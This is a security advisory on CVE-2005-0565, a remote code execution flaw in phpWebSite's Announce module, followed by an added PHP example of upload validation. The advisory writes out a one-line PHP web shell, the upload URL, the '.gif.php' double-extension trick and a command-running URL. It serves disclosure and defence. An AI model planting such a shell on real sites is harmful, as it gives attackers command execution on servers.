Category:   Application (Forum/Board/Portal)  >   phpWebSite
Vendors:   phpWebSite Development Team
phpWebSite Announce Module Image Files Let Remote Users Execute Arbitrary PHP Code
SecurityTracker Alert ID:  1013298
SecurityTracker URL:  http://securitytracker.com/id/1013298
CVE Reference:   CVE-2005-0565
Updated:  Feb 28 2005
Original Entry Date:  Feb 25 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.10.0 and prior versions
Description:   A vulnerability was reported in the Announce module of phpWebSite. A remote user with privileges to upload image files can execute arbitrary commands on the target system.

A remote user can create a specially crafted file that appears to be formatted as a GIF file but actually contains the following type of PHP code:

<?passthru($_GET[nst]);?>

If the remote user has privileges to submit announcements, the remote user can load the following type of URL and upload the specially crafted file as the Image file, using a name of the form "[anyname].gif.php":

http://[target]/index.php?module=announce&ANN_user_op=submit_announcement&MMN_position=3:3

Then, the remote user can load the following URL to execute commands on the target system:

http://[target]/images/announce/[anyname].gif.php?nst=ls -la

Arbitrary PHP code and operating system commands can be executed with the privileges of the target web service.

Network security team discovered this vulnerability.

tjomka disclosed this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  phpwebsite.appstate.edu/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.
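
An added example, not part of the advisory or of phpWebSite: one way an upload handler can refuse the "[anyname].gif.php" file described above, by judging the final extension, matching the content signature, and storing the file under a server-generated name. The function and constant names are hypothetical, the sample bytes are constructed, and PHP 7.1 or later is assumed.

```php
<?php
// Added example, not phpWebSite code. Requires PHP 7.1+.
// safe_image_name() and IMAGE_SIGNATURES are hypothetical names.

// Final extension => leading bytes a file of that type must start with.
const IMAGE_SIGNATURES = [
    'gif' => 'GIF8',
    'jpg' => "\xFF\xD8\xFF",
    'png' => "\x89PNG\r\n\x1A\n",
];

/**
 * Decide whether an uploaded image may be stored.
 * Returns a server-generated filename, or null to reject the upload.
 */
function safe_image_name(string $clientName, string $bytes): ?string
{
    // The web server picks a handler from the extension, so judge the
    // LAST one: "nst.gif.php" is a PHP script, not a GIF.
    $ext = strtolower(pathinfo(basename($clientName), PATHINFO_EXTENSION));
    if (!isset(IMAGE_SIGNATURES[$ext])) {
        return null;
    }
    // The content must match the type the extension claims.
    $magic = IMAGE_SIGNATURES[$ext];
    if (strncmp($bytes, $magic, strlen($magic)) !== 0) {
        return null;
    }
    // Never reuse the client-supplied name: a generated name has exactly
    // one dot, so no extra extension segment can reach the web server.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample inputs: a GIF header followed by placeholder bytes.
$gifBytes = 'GIF89a' . str_repeat("\x00", 32);
$samples = [
    ['nst.gif.php', $gifBytes],  // name form given in the advisory
    ['logo.GIF',    $gifBytes],  // plain GIF upload, upper-case extension
    ['logo.png',    $gifBytes],  // GIF bytes under a .png name
];
foreach ($samples as [$name, $bytes]) {
    $stored = safe_image_name($name, $bytes);
    printf("%-12s => %s\n", $name, $stored ?? 'REJECTED');
}
```

A valid image header says nothing about the bytes that follow it, so serving the upload directory with script execution disabled is a complementary control.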


 Source Message Contents

Subject:  phpWebSite-0.10.0_exploit


------------C81D4230180A6D
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

phpWebSite-0.10.0_exploit
------------C81D4230180A6D
Content-Type: application/octet-stream; name="nst.gif.php"
Content-transfer-encoding: base64
Content-Disposition: attachment; filename="nst.gif.php"

------------C81D4230180A6D
Content-Type: text/plain; name="phpWebSite-0.10.0.EN.txt"
Content-transfer-encoding: base64
Content-Disposition: attachment; filename="phpWebSite-0.10.0.EN.txt"

------------C81D4230180A6D--

 
 

